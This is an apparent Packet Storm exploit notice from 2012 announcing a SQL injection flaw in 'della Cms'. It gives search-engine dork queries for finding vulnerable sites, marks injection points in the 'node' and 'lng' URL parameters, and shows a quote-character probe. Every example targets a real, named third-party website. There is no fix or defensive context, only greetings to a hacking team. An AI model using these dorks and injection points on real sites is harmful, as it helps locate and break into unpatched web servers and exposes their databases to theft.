Della CMS SQL Injection

2012-06-04T00:00:00
ID PACKETSTORM:113257
Type packetstorm
Reporter Mr.XpR
Modified 2012-06-04T00:00:00

Description

                                        
                                            `-------------------- IN The NAme OF God --------------------  
  
  
-====della Cms Sql Injection====-  
  
# Exploit Title: della Cms Sql Injection  
# Exploit Author: Mr.XpR  
# Tested on: BackTrack  
# MAil : No0PM[at]yahoo[dot]com  
  
-====Dork====-  
  
inurl:index.php?node=  
  
inurl:index.php?node=*&lng=*  
  
-====Exploit====-  
  
http://www.jbcbellinzona.ch/index.php?node=312&lng=1[Sqli]  
http://www.jbcbellinzona.ch/index.php?node=312&lng=1[Sqli]&rif=f77134afcf  
  
-====Example====-  
  
http://www.jbcbellinzona.ch/index.php?node=312&lng=1%27  
  
-====Tnx To====-  
  
MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN   
  
Yaghi_Vahshi - HELLBOY - IrIsT - Black_King - Monfared - Sokote_Vahshat ...  
  
And All IraNHAck Security Team Members  
`